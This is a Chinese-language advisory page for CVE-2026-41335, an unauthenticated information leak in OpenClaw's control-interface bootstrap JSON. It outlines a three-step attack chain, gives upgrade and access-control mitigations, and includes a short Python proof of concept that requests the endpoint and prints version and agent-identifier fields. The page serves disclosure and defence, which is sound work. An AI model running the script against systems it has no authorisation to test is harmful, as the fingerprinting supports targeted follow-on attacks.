CVE-2026-41335 CVSS 5.3 中危

CVE-2026-41335 OpenClaw信息泄露漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41335

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026年3月31日之前的版本中存在严重的信息泄露漏洞。由于控制接口的引导JSON配置未对敏感数据进行屏蔽，导致系统版本号及助手代理标识符被暴露。远程攻击者无需交互即可利用该漏洞提取关键指纹信息，从而辅助进行针对性的后续攻击。

技术细节

该漏洞的技术根源在于OpenClaw控制接口的Bootstrap JSON响应机制设计不当。在系统初始化阶段，服务器向客户端传输的JSON数据中未经过滤地包含了详细的产品版本号及内部助手代理的标识符。由于该接口未实施强制身份验证机制，攻击者可利用网络向量直接向目标服务器发送请求。通过分析返回的HTTP响应体，攻击者能够提取出这些敏感的指纹数据。这种信息泄露虽不直接导致系统被攻陷，但能帮助攻击者精确识别目标环境，从而制定更具针对性的攻击策略，降低后续渗透测试的难度。

攻击链分析

STEP 1

侦察

攻击者通过网络扫描发现目标开放的OpenClaw控制接口。

STEP 2

漏洞利用

攻击者无需认证，直接向目标系统发送HTTP请求获取Bootstrap JSON数据。

STEP 3

信息提取

解析返回的JSON响应，提取其中包含的系统版本号和助手代理标识符。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# POC for CVE-2026-41335: OpenClaw Information Disclosure
# This script checks if the target exposes sensitive bootstrap info

target_url = "http://target-openclaw-server/api/bootstrap.json" # Example endpoint

try:
    response = requests.get(target_url, timeout=10)
    if response.status_code == 200:
        data = response.json()
        # Check for sensitive keys usually exposed in this vulnerability
        sensitive_fields = ['version', 'agent_id', 'assistant_identifier']
        found_info = {k: data[k] for k in sensitive_fields if k in data}
        
        if found_info:
            print("[+] Potential Vulnerability Detected!")
            print(json.dumps(found_info, indent=2))
        else:
            print("[-] Sensitive information not found in the response.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

建议管理员立即将OpenClaw组件升级至2026年3月31日发布的修复版本或更高版本。如果暂时无法升级，应通过防火墙或访问控制列表（ACL）严格限制对Control Interface的访问，仅允许内部受信任的网络范围访问，防止外部攻击者获取系统指纹信息。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表